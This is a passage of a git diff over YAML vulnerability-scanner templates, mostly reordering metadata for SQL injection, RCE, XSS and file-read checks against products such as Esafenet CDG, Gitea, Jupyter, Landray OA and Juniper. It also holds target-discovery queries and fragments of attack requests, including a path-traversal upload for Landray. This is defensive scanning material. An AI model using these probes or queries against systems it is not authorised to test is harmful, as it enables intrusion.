The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
- metadata:
- verified: true
- vendor: esafenet
- max-request: 1
- fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
- product: cdg
- tags: esafenet,sqli
-
classification:
cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: esafenet
+ product: cdg
+ fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
+ tags: esafenet,sqli
+
http:
- raw:
- |
@@ -32,4 +32,5 @@ http:
- 'contains(body,"操作成功")'
- 'status_code == 200'
condition: and
-# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/gitea/gitea-rce.yaml b/http/vulnerabilities/gitea/gitea-rce.yaml
index 5e5e022a3c..f1cf202a91 100644
--- a/http/vulnerabilities/gitea/gitea-rce.yaml
+++ b/http/vulnerabilities/gitea/gitea-rce.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://www.exploit-db.com/exploits/44996
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
+ classification:
+ cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
- product: gitea
vendor: gitea
+ product: gitea
+ shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
tags: gitea,rce,unauth,edb
- classification:
- cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -62,4 +62,4 @@ http:
- '"name":".*","full_name":"(.*)","description"'
internal: true
-# digest: 490a0046304402206bedfc95c5c775b9dab649e784921360bfcc0c684722fd67533e2def7e40cc7c0220665341d1ed01c8bdfa56d062fc988325a387a1fccda93d31db3dd809072ef49c:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206bedfc95c5c775b9dab649e784921360bfcc0c684722fd67533e2def7e40cc7c0220665341d1ed01c8bdfa56d062fc988325a387a1fccda93d31db3dd809072ef49c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml b/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
index 6bc535f2dc..ba49c829e1 100644
--- a/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
+++ b/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
@@ -4,15 +4,15 @@ info:
name: Jira Unauthenticated Admin Projects
author: TESS
severity: info
- metadata:
- max-request: 1
- shodan-query: http.component:"Atlassian Jira"
- product: jira
- vendor: atlassian
- tags: atlassian,jira
-
classification:
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: atlassian
+ product: jira
+ shodan-query: http.component:"Atlassian Jira"
+ tags: atlassian,jira
+
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
words:
- "atlassian.xsrf.token"
-# digest: 4a0a00473045022100d192828f15073c7df4a3d1b3369af25c0d6977b40c0a61f3976de004d38b678f0220487e369453a208bc460da114e6c9b11e804921b69a203bdddf80857f2478128f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d192828f15073c7df4a3d1b3369af25c0d6977b40c0a61f3976de004d38b678f0220487e369453a208bc460da114e6c9b11e804921b69a203bdddf80857f2478128f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
index e569b2817d..dc398b9b77 100644
--- a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
+++ b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
@@ -6,15 +6,15 @@ info:
name: Jira Unauthenticated Dashboards
author: TechbrunchFR
severity: info
- metadata:
- max-request: 1
- shodan-query: http.component:"Atlassian Jira"
- product: jira
- vendor: atlassian
- tags: atlassian,jira
-
classification:
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: atlassian
+ product: jira
+ shodan-query: http.component:"Atlassian Jira"
+ tags: atlassian,jira
+
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
# If you change this setting, you will still need to update the existing filters and dashboards if they have already been
# shared publicly.
# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced.
-# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml
index 7c8c092ec8..2bb208d08f 100644
--- a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml
+++ b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml
@@ -6,15 +6,15 @@ info:
severity: info
reference:
- https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get
- metadata:
- max-request: 1
- shodan-query: http.component:"Atlassian Jira"
- product: jira_data_center
- vendor: atlassian
- tags: atlassian,jira
-
classification:
cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: atlassian
+ product: jira_data_center
+ shodan-query: http.component:"Atlassian Jira"
+ tags: atlassian,jira
+
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
words:
- "atlassian.xsrf.token"
-# digest: 4b0a00483046022100f47ced43b8419319e9c9ec86664c53d54c3445bffd4b95b2253a39b81856bc20022100e9d254c328d1a1daf297468d1fc6ae202f3e5aa15505af50625e290a019cdfef:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f47ced43b8419319e9c9ec86664c53d54c3445bffd4b95b2253a39b81856bc20022100e9d254c328d1a1daf297468d1fc6ae202f3e5aa15505af50625e290a019cdfef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
index 2fc6131f5d..9dcdb06e0a 100644
--- a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
+++ b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
@@ -4,15 +4,15 @@ info:
name: Jira Unauthenticated User Picker
author: TechbrunchFR
severity: info
- metadata:
- max-request: 1
- shodan-query: http.component:"Atlassian Jira"
- product: jira_data_center
- vendor: atlassian
- tags: atlassian,jira
-
classification:
cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: atlassian
+ product: jira_data_center
+ shodan-query: http.component:"Atlassian Jira"
+ tags: atlassian,jira
+
http:
- method: GET
path:
@@ -23,4 +23,4 @@ http:
words:
- 'user-picker'
-# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/juniper/junos-xss.yaml b/http/vulnerabilities/juniper/junos-xss.yaml
index 1ee53bcc2e..c66fa13a12 100644
--- a/http/vulnerabilities/juniper/junos-xss.yaml
+++ b/http/vulnerabilities/juniper/junos-xss.yaml
@@ -6,17 +6,16 @@ info:
severity: medium
reference:
- https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/
+ classification:
+ cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
+ vendor: juniper
+ product: junos
shodan-query: title:"Juniper Web Device Manager"
fofa-query: title="Juniper Web Device Manager"
- product: junos
- vendor: juniper
tags: junos,xss
-
- classification:
- cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
variables:
string: "{{to_lower(rand_base(2))}}"
@@ -28,7 +27,6 @@ http:
Content-Type: application/x-www-form-urlencoded
rs=emit_debug_note&rsargs[]={{string}}&rsargs[]=
-
- |
POST /webauth_operation.php HTTP/1.1
Host: {{Hostname}}
@@ -37,6 +35,7 @@ http:
rs=sajax_show_one_stub&rsargs[]={{string}}
stop-at-first-match: true
+
matchers-condition: or
matchers:
- type: word
@@ -52,4 +51,5 @@ http:
- ""
- "wrapper for"
condition: and
-# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/jupyter-notebook-rce.yaml b/http/vulnerabilities/jupyter-notebook-rce.yaml
index e305b6c725..8ec3819932 100644
--- a/http/vulnerabilities/jupyter-notebook-rce.yaml
+++ b/http/vulnerabilities/jupyter-notebook-rce.yaml
@@ -8,18 +8,18 @@ info:
Jupyter Notebook is an interactive Notebook, computer application is a web based visualization, Jupyter Notebook API/terminals path there are loopholes in the remote command execution.
reference:
- https://github.com/SCAMagic/SCAMagicScan/blob/de8130a2280ee08d719ac6612e590b8e2678fb97/pocs/poc-yaml-jupyter-notebook-rce.py
+ classification:
+ cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: jupyter
+ product: notebook
shodan-query: title:"jupyter notebook"
fofa-query: title="jupyter notebook"
zoomeye-query: title:"jupyter notebook"
- product: notebook
- vendor: jupyter
tags: jupyter,notebook,rce,bypass
- classification:
- cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -45,4 +45,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100d06d582f3dce65ba20911abf7ffe40eca96e18be358259a394e2fa87b15b52a6022100e6287f726c5f22a21d16220fa41e95782105ffb70db2259c35a01809a6b3fb42:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d06d582f3dce65ba20911abf7ffe40eca96e18be358259a394e2fa87b15b52a6022100e6287f726c5f22a21d16220fa41e95782105ffb70db2259c35a01809a6b3fb42:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/landray/landray-eis-sqli.yaml b/http/vulnerabilities/landray/landray-eis-sqli.yaml
index 9f53e558aa..5c9ca6f1d8 100644
--- a/http/vulnerabilities/landray/landray-eis-sqli.yaml
+++ b/http/vulnerabilities/landray/landray-eis-sqli.yaml
@@ -8,16 +8,16 @@ info:
Landray's smart collaboration platform EIS has a very rich collection of modules to meet the needs of organizations and enterprises in knowledge, collaboration, and project management system construction. There is a SQL injection vulnerability in the rpt_listreport_definefield.aspx interface of Landray EIS smart collaboration platform
reference:
- https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8CEIS%E6%99%BA%E6%85%A7%E5%8D%8F%E5%90%8C%E5%B9%B3%E5%8F%B0rpt_listreport_definefield.aspx%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: app="Landray-OA系统"
- product: landray_office_automation
vendor: landray
+ product: landray_office_automation
+ fofa-query: app="Landray-OA系统"
tags: landray,eims,sqli
- classification:
- cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- "Microsoft SQL Server"
- "SqlException"
condition: and
-# digest: 4a0a00473045022100926fe7b0a4fb4e4270d3639b217676718075b3110d9568994f28c2ebd409fc58022010ad57c7f0121868d177390eb364af1e919389abc1094d73e26b94a1a5ef00c6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100926fe7b0a4fb4e4270d3639b217676718075b3110d9568994f28c2ebd409fc58022010ad57c7f0121868d177390eb364af1e919389abc1094d73e26b94a1a5ef00c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
index 08ec9af8fe..c9b2cfdcc5 100644
--- a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
+++ b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
@@ -8,17 +8,16 @@ info:
There is a remote command execution vulnerability in Lanling OA replaceExtend Method. Use This Method To Move dataxml.jsp To A Dirctory That Can Access Without Auth,Then An attacker can Run Command With this.
reference:
- https://forum.ywhack.com/thread-203681-1-1.html
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: landray
+ product: landray_office_automation
fofa-query: app="Landray-OA系统"
hunter-query: web.body=="蓝凌软件",web.icon=="302464c3f6207d57240649926cfc7bd4"
- product: landray_office_automation
- vendor: landray
tags: landray,oa,dataxml,rce,replaceExtend
-
- classification:
- cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
variables:
string: "{{randstr}}"
@@ -47,7 +46,6 @@ http:
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--
-
- |
POST /resource/help/sys/portal/dataxml.jsp HTTP/1.1
Host: {{Hostname}}
@@ -68,4 +66,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
index 18c956350c..70f3de5374 100755
--- a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
+++ b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce/blob/main/landray-oa-treexml-rce.yaml
- https://vuls.info/PeiQi/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#_4
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: app="Landray-OA系统"
- product: landray_office_automation
vendor: landray
+ product: landray_office_automation
+ fofa-query: app="Landray-OA系统"
tags: landray,oa,treexml,rce
- classification:
- cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -47,4 +47,4 @@ http:
status:
- 200
-# digest: 4b0a0048304602210096f0ba9e6a94142423797bf77a9ada7c90c4b3df0f7a5da5c7f3dca65655cee60221009eaf25bf39f22f5cc51eb59c17943967a388d54fe9aa843d341a6ef2af2af5ce:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a0048304602210096f0ba9e6a94142423797bf77a9ada7c90c4b3df0f7a5da5c7f3dca65655cee60221009eaf25bf39f22f5cc51eb59c17943967a388d54fe9aa843d341a6ef2af2af5ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/magento/magento-2-exposed-api.yaml b/http/vulnerabilities/magento/magento-2-exposed-api.yaml
index 75580995df..0f9f729b00 100644
--- a/http/vulnerabilities/magento/magento-2-exposed-api.yaml
+++ b/http/vulnerabilities/magento/magento-2-exposed-api.yaml
@@ -7,15 +7,15 @@ info:
description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed.
reference:
- https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api
- metadata:
- max-request: 3
- shodan-query: http.component:"Magento"
- product: magento
- vendor: magento
- tags: magento
-
classification:
cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 3
+ vendor: magento
+ product: magento
+ shodan-query: http.component:"Magento"
+ tags: magento
+
http:
- method: GET
path:
@@ -49,4 +49,4 @@ http:
- 'status_code == 200'
condition: and
-# digest: 490a0046304402205108a66aabb3bfd2cfa26f2fd4816a1afa5f3c52dd43f5ea029a1308d8079204022045463c3b751fd59511882d4eb2e2f046f4f31c5f5c3fcc52daac8d8adcb2214d:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205108a66aabb3bfd2cfa26f2fd4816a1afa5f3c52dd43f5ea029a1308d8079204022045463c3b751fd59511882d4eb2e2f046f4f31c5f5c3fcc52daac8d8adcb2214d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/magento/magento-cacheleak.yaml b/http/vulnerabilities/magento/magento-cacheleak.yaml
index d7db864938..23242e46a8 100644
--- a/http/vulnerabilities/magento/magento-cacheleak.yaml
+++ b/http/vulnerabilities/magento/magento-cacheleak.yaml
@@ -9,16 +9,16 @@ info:
- https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak
- https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/
- https://royduineveld.nl/magento-cacheleak-exploit/
+ classification:
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.component:"Magento"
- product: magento
vendor: magento
+ product: magento
+ shodan-query: http.component:"Magento"
tags: magento
- classification:
- cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +42,4 @@ http:
- "application/json"
part: header
-# digest: 4a0a00473045022100de286b51595551dd63ed4f45c9696d2a979ce475077de534e534eb76434b95fa02206b3e3bc4edc92082864db25b3fd418e2e6c4d363e88258107d180b663dae6eb5:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100de286b51595551dd63ed4f45c9696d2a979ce475077de534e534eb76434b95fa02206b3e3bc4edc92082864db25b3fd418e2e6c4d363e88258107d180b663dae6eb5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml
index 8ad4a0a339..3fa840abc7 100644
--- a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml
+++ b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml
@@ -7,16 +7,16 @@ info:
description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers".
reference:
- https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing
+ classification:
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.component:"Magento"
- product: magento
vendor: magento
+ product: magento
+ shodan-query: http.component:"Magento"
tags: magento
- classification:
- cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -43,4 +43,4 @@ http:
- 'status_code == 200'
condition: and
-# digest: 4a0a00473045022100aa2dd782c5c6482ec1191a3627d6dda4edac4923a36f14a3f84ce0d78de6c5b0022077789122da6cb4e43570c9fc4cbd341415be115088443f7f37a49fb57fa678c1:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100aa2dd782c5c6482ec1191a3627d6dda4edac4923a36f14a3f84ce0d78de6c5b0022077789122da6cb4e43570c9fc4cbd341415be115088443f7f37a49fb57fa678c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml
index d61b12a21a..35f48b0493 100644
--- a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml
+++ b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml
@@ -9,17 +9,17 @@ info:
- https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/
- https://bryces.io/blog/nuxt3
- https://twitter.com/fofabot/status/1669339995780558849
+ classification:
+ cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
+ vendor: nuxt
+ product: framework
shodan-query: html:"buildAssetsDir" "nuxt"
fofa-query: body="buildAssetsDir" && body="__nuxt"
- product: framework
- vendor: nuxt
tags: huntr,lfi,nuxtjs
- classification:
- cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
part: header
words:
- "application/json"
-# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/other/acti-video-lfi.yaml b/http/vulnerabilities/other/acti-video-lfi.yaml
index b5ad8f5266..0cdae7821f 100644
--- a/http/vulnerabilities/other/acti-video-lfi.yaml
+++ b/http/vulnerabilities/other/acti-video-lfi.yaml
@@ -8,17 +8,17 @@ info:
ACTI video surveillance has loopholes in reading any files
reference:
- https://www.cnblogs.com/hmesed/p/16292252.html
+ classification:
+ cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: acti
+ product: camera_firmware
shodan-query: title:"Web Configurator"
fofa-query: app="ACTi-视频监控"
- product: camera_firmware
- vendor: acti
tags: acti,lfi,iot,video,monitoring
- classification:
- cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100b740ba6fc1aece72e634dd7f2c10ac3d13ca38392f48f8ac1470efbc64891fae022100a05aead43e2ec6f1973fdb9b3c5dea959517f6edea370fbbafba94b698b9331e:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b740ba6fc1aece72e634dd7f2c10ac3d13ca38392f48f8ac1470efbc64891fae022100a05aead43e2ec6f1973fdb9b3c5dea959517f6edea370fbbafba94b698b9331e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml
index f4a3244a39..192ba02a55 100644
--- a/http/vulnerabilities/other/bagisto-csti.yaml
+++ b/http/vulnerabilities/other/bagisto-csti.yaml
@@ -9,15 +9,15 @@ info:
reference:
- https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html
- https://demo.bagisto.com/
- metadata:
- fofa-query: "Bagisto"
- max-request: 1
- product: bagisto
- vendor: webkul
- tags: bagisto,csti,packetstorm,ssti
-
classification:
cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: webkul
+ product: bagisto
+ fofa-query: "Bagisto"
+ tags: bagisto,csti,packetstorm,ssti
+
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
part: content_type
words:
- "text/html"
-# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/other/beyond-trust-xss.yaml b/http/vulnerabilities/other/beyond-trust-xss.yaml
index 102b33b812..9fc3b330e4 100644
--- a/http/vulnerabilities/other/beyond-trust-xss.yaml
+++ b/http/vulnerabilities/other/beyond-trust-xss.yaml
@@ -8,17 +8,17 @@ info:
Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
reference:
- https://www.exploit-db.com/exploits/50632
+ classification:
+ cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: beyondtrust
+ product: remote_support
shodan-query: html:"BeyondTrust"
google-query: intext:"BeyondTrust" "Redistribution Prohibited"
- product: remote_support
- vendor: beyondtrust
tags: beyondtrust,xss,intrusive
- classification:
- cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,4 @@ http:
- 'contains(body, "